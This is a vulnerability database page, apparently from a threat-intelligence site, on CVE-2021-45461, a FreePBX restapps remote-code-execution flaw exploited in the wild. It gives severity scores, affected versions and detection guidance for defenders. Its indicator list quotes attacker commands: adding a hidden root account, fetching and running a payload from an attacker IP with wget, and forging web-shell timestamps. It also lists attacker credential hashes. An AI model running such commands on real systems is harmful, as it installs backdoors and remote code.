cbcvebase.
CVE-2021-45461
published 2021-12-22

CVE-2021-45461: FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code…

PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
21.66%
97.3th percentile
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.

Affected

4 ranges
VendorProductVersion rangeFixed in
sangomarestapps
sangomarestapps
sangomarestapps
sangomarestapps

Detection & IOCsextracted from sources · hover to see the quote

ip37.49.230.74
urlhxxp://37.49.230.74/k.php
urlhxxp://37.49.230.74/z/wr.php
urlhxxp://37.49.230.74/z/post/noroot.php
urlhxxp://37.49.230.74/z/post/root.php
filenamek.php
filenamewr.php
path/var/www/html/rest_phones/ajax.php
path/var/www/html/admin/modules/core/ajax.php
path/var/www/html/digium_phones/ajax.php
path/var/www/html/admin/assets/js/config.php
path/var/www/html/admin/assets/config.php
path/var/www/html/admin/assets/ajax.php
path/var/www/html/phones/ajax.php
path/var/www/html/digium_phoness/ajax.php
path/var/www/html/fpbxphones/ajax.php
path/var/www/html/freepbxphones/ajax.php
path/var/www/html/freepbx/ajax.php
path/var/www/html/admin/views/ajax.php
path/var/www/html/admin/views/.htaccess
path/var/www/html/admin/modules/freepbx_ha/license.php
path/var/spool/asterisk/tmp/serv
path/var/lib/asterisk/bin/zen2
path/var/lib/asterisk/bin/devnull2
path/var/lib/asterisk/bin/devnull
path/etc/freepbx.conf
commanduseradd -s /bin/bash -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null
command(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1
commandtouch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php
othersugarmaint:uenQjcP3Il/zE
othersupports:uenQjcP3Il/zE
  • Look for the web shell parameter 'md5' in HTTP requests to ajax.php on FreePBX/Elastix servers — the web shell authenticates by comparing a user-supplied MD5 hash against a hardcoded value mapped to the victim's public IP.
  • Hunt for creation of local user accounts named 'sugarmaint', 'supports', or 'newfpbx' with UID 0 on FreePBX/Asterisk hosts.
  • Monitor for crontab entries that fetch and execute k.php from a remote IP every minute — a key persistence indicator for this campaign.
  • Detect file writes to /var/lib/asterisk/bin/ for non-standard binaries named 'zen2', 'devnull2', or 'devnull' — these are dropper persistence artifacts.
  • Alert on chmod 000 applied to ajax.php or model.php in FreePBX web directories — the dropper does this to clear the way before deploying its own web shell.
  • Detect timestamp-forging activity: 'touch <webshell_file> -r <legitimate_file>' in FreePBX web directories, used to blend malicious files with legitimate ones.
  • Monitor for the presence of license.php under /var/www/html/admin/modules/freepbx_ha/ — this is a malicious persistence dropper, not a legitimate FreePBX file.
  • The malware implants a random junk string in each download to evade hash-based IOC detection — rely on behavioral and path-based detections rather than file hashes alone.
  • ·The web shell's MD5 authentication hash is uniquely mapped per victim — the hardcoded hash value will differ across compromised hosts, making it unsuitable as a universal static IOC.
  • ·The malware injects random junk strings into each downloaded payload, meaning file hashes will be unique per download and cannot be relied upon for signature-based detection.
  • ·The dropper forges file timestamps on deployed web shells to match legitimate FreePBX files, so timestamp-based forensic triage will not reliably identify malicious files.
  • ·The web shell is deployed to at least 12 distinct paths under /var/www/html/ — remediation must check all listed locations, not just the primary ajax.php path.
  • ·The dropper echoes the 'rm' command three times without executing it to create the false appearance of self-removal — do not assume the malware is gone based on log entries showing rm commands.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.